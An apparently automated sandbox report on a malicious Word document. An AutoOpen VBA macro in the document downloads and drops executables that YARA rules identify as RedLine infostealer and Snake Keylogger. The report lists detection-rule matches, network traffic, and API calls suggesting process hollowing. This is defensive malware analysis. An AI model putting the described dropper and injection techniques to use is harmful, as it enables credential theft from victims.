                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: jphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53643 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53734 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:53795 version: TLS 1.2
                  Source: Yara match File source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR

                  System Summary

                  Source: 10.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.brightness.exe.215f2418.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.brightness.exe.21659f78.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 12.2.Aiymwhpj.PIF.212333d8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.1.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.1.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000013.00000001.2327344722.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000013.00000002.3731782871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000001.2248691179.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000F.00000002.3731678723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000001.2128731771.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: ITT # KRPBV2663 .doc Stream path 'Macros/VBA/ThisDocument': found possibly 'ADODB.Stream' functions open, savetofile, write
                  Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, write Name: AutoOpen
                  Source: ITT # KRPBV2663 .doc Stream path 'Macros/VBA/ThisDocument': found possibly 'XMLHttpRequest' functions response, responsebody, open, send
                  Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, send Name: AutoOpen
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Windows\SysWOW64\brightness.exe
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\InProcServer32
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027C824C NtReadVirtualMemory
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027C84BC NtUnmapViewOfSection
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027C8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027C79AC NtAllocateVirtualMemory
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027CDE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027CDF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027CDFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027C7CF8 NtWriteVirtualMemory
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027C8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027C79AA NtAllocateVirtualMemory
                  Source: C:\Windows\SysWOW64\brightness.exe Code function: 7_2_027CDE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028C824C NtReadVirtualMemory
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028C84BC NtUnmapViewOfSection
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028C8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028C79AC NtAllocateVirtualMemory
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028CDE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028CDFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028CDF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028C7CF8 NtWriteVirtualMemory
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028C8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIF Code function: 12_2_028C79AA NtAllocateVirtualMemory
